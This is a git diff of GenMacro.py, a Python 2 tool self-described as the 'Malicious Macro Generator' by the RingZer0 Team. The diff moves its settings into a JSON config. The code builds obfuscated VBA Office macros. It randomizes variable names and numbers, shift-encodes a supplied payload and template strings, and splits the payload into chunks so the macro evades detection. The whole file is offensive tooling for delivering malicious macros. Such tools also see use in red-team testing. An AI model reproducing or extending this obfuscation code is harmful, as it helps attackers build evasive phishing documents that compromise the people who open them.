diff --git a/GenMacro.py b/GenMacro.py index 042666b..cf71dd5 100644 --- a/GenMacro.py +++ b/GenMacro.py @@ -3,40 +3,75 @@ import random import string import os import re +import json + +def load_config(filename): + config = load_data(filename) + items = {} + try: + items = json.loads(config) + except: + print "[-] \"%s\" is not a valid config file." % filename + exit(0) + return items + +def get_config(config, key): + if config.has_key(key): + return config[key] + else: + print "[-] \"%s\" not found in the config file." % key + exit(0) + +def get_config_vars(config): + vars =get_config(config, "encodedvars") + return vars + +def show_description(config): + description = get_config(config, "description") + print "[*] Payload: %s" % description def gen_var(size): return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) def gen_int(size): return ''.join(random.SystemRandom().choice(string.digits) for _ in range(size)) + +def randomize_vars(buffer, vars, iter): + for var in vars: + for i in reversed(range(1, iter)): + buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20))) + return buffer + +def randomize_int(buffer, var, min, max, iter): + for i in reversed(range(1, iter)): + buffer = buffer.replace("[" + var + str(i) + "]", gen_int(random.randrange(min, max))) + return buffer def encode_data(buffer, offset): data = "" for c in buffer: - data += chr(ord(c) + int(sys.argv[3])) + data += chr(ord(c) + int(offset)) return data -def randomize_vars(buffer, vars): - for var in vars: - for i in reversed(range(1, 40)): - buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20))) +def encode_config_vars(buffer, vars, offset): + for var in vars.keys(): + buffer = replace_var_encode(buffer, var, vars[var], offset) return buffer - -def randomize_int(buffer): - for i in reversed(range(1, 40)): - buffer = buffer.replace("[int" + str(i) + "]", gen_int(random.randrange(3, 5))) + +def replace_var_encode(buffer, var, data, offset): + encoded = encode_data(data, offset) + buffer = buffer.replace("[" + var + "]", encoded) return buffer - -def encode_domain(buffer, domain, offset): - domain = encode_data(domain, offset) - buffer = buffer.replace("[DOMAIN]", domain) + +def replace_var(buffer, var, data): + buffer = buffer.replace("[" + var + "]", str(data)) return buffer def gen_chunk(buffer, payload, offset): payload = encode_data(payload, offset) vars = "Dim " + gen_var(random.randrange(5, 20)) + " As String\r\n" args = "" - size = 0 + size = 0 for item in re.findall("." * 200, payload): current_var = gen_var(random.randrange(5, 20)) @@ -61,7 +96,7 @@ def load_data(filename): buffer = open(filename, "rb").read() return buffer else: - print "[-] \"%s\"File not found." % filename + print "[-] \"%s\" file not found." % filename exit(0) def save_macro(filename, buffer): @@ -73,32 +108,41 @@ def save_macro(filename, buffer): print "[*] Saving \"%s\" as the final macro" % filename def banner(): - print "MaliciousMacroGenerator V1.0 - charles.hamilton@mandiant.com RingZer0 Team" + print "Malicious Macro Generator V1.1 - RingZer0 Team\nAuthor: Mr.Un1k0d3r charles.hamilton@mandiant.com\n" def help(): - print "Usage: %s [template] [domain] [offset] [payload] [output]\n\n\ttemplate\tTemplate macro\n\tdomain\t\tTarget domain name (USERDOMAIN env variable value)\n\toffset\t\tEncoding offset (default 3)\n\tpayload\t\tPayload to be executed\n\toutput\t\tOutput filename" % sys.argv[0] + print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\t\tOutput filename for the macro" % sys.argv[0] if __name__ == "__main__": + config = "" data = "" + iter = 0 vars = ["var", "func", "data", "cond", "int"] offset = 0 domain = "" banner() - if len(sys.argv) < 6: + if len(sys.argv) < 3: help() exit(0) - offset = int(sys.argv[3]) - domain = sys.argv[2] + config = load_config(sys.argv[1]) + show_description(config) + offset = int(get_config(config, "encodingoffset")) + data = load_data(get_config(config, "template")) + iter = int(get_config(config, "varcount")) + data = replace_var(data, "OFFSET", offset) - data = load_data(sys.argv[1]) - data = randomize_int(data) - data = randomize_vars(data, vars) - data = encode_domain(data, domain, offset) - data = gen_chunk(data, sys.argv[4], offset) + data = randomize_int(data, "SMALLINT", 1, 2, iter) + data = randomize_int(data, "INT", 2, 5, iter) + data = randomize_vars(data, vars, iter) - save_macro(sys.argv[5], data) + template_vars = get_config_vars(config) + data = encode_config_vars(data, template_vars, offset) - print "[*] Completed" \ No newline at end of file + data = gen_chunk(data, get_config(config, "payload"), offset) + + save_macro(sys.argv[2], data) + + print "[*] Macro generation is completed"